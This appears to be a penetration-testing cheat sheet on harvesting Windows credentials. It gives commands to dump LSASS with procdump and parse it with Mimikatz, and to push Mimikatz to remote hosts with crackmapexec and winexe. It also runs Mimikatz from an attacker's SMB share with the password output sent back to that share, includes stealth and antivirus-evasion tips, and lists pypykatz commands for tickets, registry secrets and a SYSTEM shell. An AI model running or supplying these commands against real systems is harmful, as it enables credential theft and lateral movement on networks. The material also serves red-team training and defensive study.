# Avoiding running Mimikatz on the target can be a nice solution for stealth# You can just dump the LSASS process, get them and parse it locally
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Several dumping methods here
https://kaluche.github.io/posts/2020/09/dumping-credentials-offline/
Mimikatz
# If you have an LSASS dump, you can use the minidump module
mimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonPasswords /full# You can upload mimikatz to a remote machine with smbclient# Or you can use crackmapexec# Executon may fail but the binary will be uploaded in C:\\Windows\\mimikatz.exe
crackmapexec IP -u user -p password -M mimikatz
# Then you can execute remotely through winexe
winexe -U admin%password //IP C:\\Windows\\mimikatz.exe
# Password dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords /full
# In case of Mimikatz is trigerred on the target machine, you can try bring it up using network share
sudo python smbserver.py SHARE /home/xxxxx/share_path/
sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords /full" exit > \\share_ip\SHARE\mimiout_$env:computername.txt'# In order to be stealthier, you can even do the same for procdump
sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\procdump.exe "TODO"'
Pypykatz
https://github.com/skelsec/pypykatz
# Mimikatz implementation in pure Python. At least a part of it :)# In case of mimikatz is trigerred by the target AV# Cross platform (only need python3.6)# Live commands need to be ran on live systems# Others commands can be used for other purposes
# Get LSASS credentials (+ Kerberos tickets)
pypykatz live lsa
pypykatz live lsa -o <output_dir> -k <kerberos_dir>
# List users prone to SPNRoast and ASRepRoast
pypykatz live ldap spn
pypykatz live ldap asrep
# Print all tokens
pypykatz live token list
# Spawn a SYSTEM shell
pypykatz live process create
# Print registry credentials
pypykatz live registry
# List all users ever logged on the target
pypykatz live users list
# Gives back the current user in domain:username:SID format
pypykatz live users whoami